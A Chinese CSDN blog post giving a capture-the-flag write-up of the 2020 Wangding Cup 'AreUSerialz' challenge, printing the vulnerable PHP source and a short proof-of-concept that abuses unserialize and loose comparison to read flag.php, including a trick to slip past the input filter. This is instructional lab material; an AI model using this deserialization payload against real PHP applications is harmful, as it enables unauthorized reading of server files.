CTF--[网鼎杯 2020 青龙组]AreUSerialz

已于 2022-10-13 15:41:45 修改
阅读量997 收藏 2
点赞数
分类专栏: 安全 CTF 文章标签: php 开发语言 web安全 CTF PHP反序列化
于 2022-10-13 15:26:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bossDDYY/article/details/127302314
版权
安全 同时被 2 个专栏收录
24 篇文章 2 订阅
订阅专栏
CTF
9 篇文章 0 订阅
订阅专栏

这个题目没什么难度,就是一个简单的php反序列化+php弱类型比较

根据题目提示 猜测就可能是反序列化

打开题目 给的是源码 发现unserialize函数 确定是反序列化

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qXbe9Z6U-1665645745208)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221010215911564.png)]

阅读源码 寻找POP链

 <?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
    protected $op;
    protected $filename;
    protected $content;
    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }
    public function process() {
        if($this->op == "1") {
            $this->write();
			//这里使用的是 == 弱类型判断 我们是要读取本目录下的flag.php的
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }
...
    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }
    function __destruct() {
		//2.触发这个但是这里有一个修改值 我们根据后续发现$this->op应该要等于2的 因为等于2是读取文件
		//这里使用的是===绝对判断相等  结合后续使用的是==弱类型判断   所以这里可以进行绕过  这里是字符串进行比较,不是字符串和数字进行比较(因为我刚开始当作数字和字符串比较 一直无法绕过) 前面加空格即可
		// $this->op = " 2";  
		//  $this->filename = "flag.php";
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }
}
...
if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
		//1.触发 __wakeup()和 __destruct()
        $obj = unserialize($str);
    }

}

POC

class FileHandler {
    public $op;
    public $filename;
    function __construct() {
        $this->op = " 2";
        $this->filename = "flag.php";
    }
}
echo (serialize(new FileHandler()));

对咯!有一点为什么源码对变量的引用是protected而我是用的是public ?
首先,因为php v7.x反序列化的时候对访问类别不敏感,所以可以变化
其次,public变量直接变量名反序列化出来,protected变量\x00 + * + \x00 + 变量名,private变量\x00 + 类名 + \x00 + 变量名
题目中有一个is_valid有效性验证输入,要求必须在ASCII32-127可见字符内,但是\x00的ASCII码是0所以我们要使用public类型 进行算是绕过吧

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MTlrrtqA-1665645745209)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221010225647713.png)]

yb0os1
关注
专栏目录
网鼎杯2020[青龙]--AreUSerialz
Oavinci的博客
06-28 7125
知识点: PHP反序列化漏洞 弱类型比较 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp...
CTF赛题-[网鼎杯2020青龙]AreUSerialz
m0_57379855的博客
03-25 2146
CTF赛题-[网鼎杯2020青龙]AreUSerialz代码审计构造函数 代码审计 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filenam
buuctf - [网鼎杯 2020 青龙]AreUSerialz
qq_40860153的博客
10-11 2723
1.题目源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content
[网鼎杯 2020 青龙]AreUSerialz
pakho_C的博客
02-09 1012
web第28题 [网鼎杯 2020 青龙]AreUSerialz 打开靶场直接给出源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filen
BUUCTF-[网鼎杯 2020 青龙]虚幻2
m0_67507776的博客
05-10 1651
1.打开得到一个无后缀文件,使用010 Editor 打开,查看文件类型 2.后缀更改为png,打开发现可能与通道有关 3.使用stegsolve打开,分别保存R、G、B三个通道的图片 4.思路详解见大神wp:2020网鼎杯-青龙-虚幻2 手撸的步骤是将 RGB 通道分开得到的图片按 G, R, B 的顺序分别逐行拆成条,逐行交叉按顺序拼接,由左向右按拼完之后,将得到的图片逆时针旋转 90 度,再把左下角的 7*7 的寻像...
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,webweb题为thinkjava
2020年第二届“网鼎杯”网络安全大赛 青龙】Crypto boom
01-20
题目 原创文章 58获赞 99访问量 8393 关注 私信 展开阅读全文 作者:你们这样一点都不可耐
2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络...
网鼎杯2022白虎:逆向、Pwn、Misc与加解密题目解析
资源摘要信息: "网鼎杯2022白虎题目分享" 网鼎杯作为国内知名的网络安全竞赛活动,吸引了众多网络安全爱好者和专业人士参与。2022年白虎的比赛涵盖了多个网络安全领域的重要知识点,包括逆向工程、二进制漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值